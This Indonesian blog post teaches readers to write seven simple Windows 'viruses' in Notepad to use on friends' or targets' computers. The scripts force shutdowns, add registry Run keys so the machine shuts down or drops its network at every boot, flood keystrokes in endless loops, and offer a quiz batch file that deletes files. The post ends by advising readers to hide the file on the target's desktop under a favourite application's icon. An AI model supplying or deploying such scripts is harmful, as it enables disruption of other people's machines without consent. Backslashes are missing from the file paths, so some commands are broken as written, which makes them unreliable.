7 cara membuat virus di notepad



Halo gan...... Kembali lagi sama gw Mr.KeY yang proπŸ˜‚πŸ˜‚, kali ini saya mau memberikan materi tentang membuat virus windows dari notepad ya gan :'v
Langsung aja ke topik pembahasan kgk usah basa basi :

1. Membuat Virus Shutdown
Cara kerja virus komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi Shutdown. Untuk melakukannya, silakan buka Notepad, dan copy paste kode di bawah. Lalu save file-nya dengan nama ForceShutdown.bat dan type file-nya All file.
@echo off msg * I don't like you shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s
Untuk mengaktifkan virus ini, kamu harus klik 2 kali pada file-nya. Maka, secara otomatis virus ini akan berjalan.


2. Paksa Shutdown Setiap Kali Dinyalakan

Berbeda dengan virus sebelumnya, virus sederhana yang ini akan memaksa komputer teman kamu untuk Shutdown setiap kali dinyalakan. Eits, jangan asal gunakan virus ini kalo gak siap tanggung akibatnya ya!
echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f echo You have been HACKED. PAUSE
Simpan file buatan kamu di atas dengan nama apapun. Jangan lupa gunakan ekstensi .bat ya! Lalu klik untuk mengaktifkannya.

3. Mematikan Internet Secara Permanen

Saat berada di suatu jaringan internet, pasti kesal dong jika ada orang yang malah download? Bikin internet lemot karena bandwith berkurang cepat. Makanya, coba matikan internet teman kamu menggunakan script virus sederhana berikut:
echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE
Seperti biasa, simpan dengan nama apapun dan gunakan ekstensi .bat. Lalu klik untuk mengaktifkannya!

4. Virus Caps Lock

Siapa yang tidak kesal jika ada orang ngetik isinya huruf besar semua? Orang yang menerima pesan dengan huruf besar semua jelas akan merasa terganggu, atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat tombol Caps Lock-nya nyala terus menggunakan script virus sederhana berikut:
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop
Copy dan paste kode di atas ke Notepad, lalu simpan dengan nama file ForceCapsLock.vbs dan type file-nya All file. Klik 2 kali untuk mulai mengaktifkan virus komputer sederhana ini.

5. Virus Alay

Siapa bilang cuma anak muda kekinian doang yang bisa alay? Komputer kamu juga bisa alay loh kalo terinspeksi virus keyboard alay. Nah, untuk membuat virus komputer yang akan membuat keyboard jadi alay, kamu bisa gunakan script berikut:
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wscript.sleep 100 wshshell.sendkeys "{NUMLOCK}" wscript.sleep 100 wshshell.sendkeys "{SCROLLLOCK}" loop
Caranya sama, copy dan paste kode di atas ke Notepad. Lalu save dengan nama ForceAlay.vbs dan type file All file.


6. Virus Orang Jelek


Dikatain jelek itu emang nyebelin. Kalo cuma sekali dua kali sih harusnya masih bisa ditahan, tapi kalo terus-terusan ngatain jelek gimana coba? Nah, dengan kode di bawah ini, kamu bisa membuat sebuah virus komputer sederhana yang akan memaksa komputer target untuk mengeluarkan alert bahwa 'dia jelek' tanpa henti.

Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "<span class="color-red">Muka Lu Jelek Kayak Komputer Lu</span>" loop

Copy dan paste script virus sederhana di atas ke Notepad. Oh iya, kamu bisa ganti bagian warna merah dengan kata-kata sesuai selera, lalu save dengan nama VirusOrangJelek.vbs


7. Virus Kuis

Semua orang suka kuis apalagi kalo berhadiah. Tapi kamu bakal kesal deh pasti kalo setiap kali mau buka komputer, ternyata yang nongol adalah kuis. Ya kan? Buat kamu yang mau isengin komputer target dengan kuis-kuis menyebalkan, coba kamu gunakan script berikut:

@echo off title Kuis hari ini! :menu cls echo Jika kamu kena virus apa yang kamu lakukan? pause echo pilih yang mana: echo 1. Matiin komputer echo 2. Format aja echo 3. Nangis echo 4. Beli komputer baru set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:xxx if %input%==3 @ECHO off msg * Muka lu jelek msg * Ngaca dulu gih! msg * Hayo lu, CPU lu gw acak-acak ya msg * Udah, install ulang aja msg * Mau kelar kan masalahnya? @ECHO off :top START %SystemRoot% system32notepad.exe GOTO top
Copy dan paste deh ke Notepad dengan nama ViruzQuiz.bat. Selesai, tinggal jalankan untuk mengujinya.
Agar berjalan lancar, coba simpan file virus komputer sederhana yang kamu buat di komputer target. Lalu letakkan file tersebut di desktop, dan jangan lupa ubah ikon shortcut-nya jadi aplikasi favorit target.

Sekian dari tutor gw bila ada kesalahan tolong dimaafkan

0 Response to "7 cara membuat virus di notepad"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 2

Iklan Bawah Artikel adnow

loading...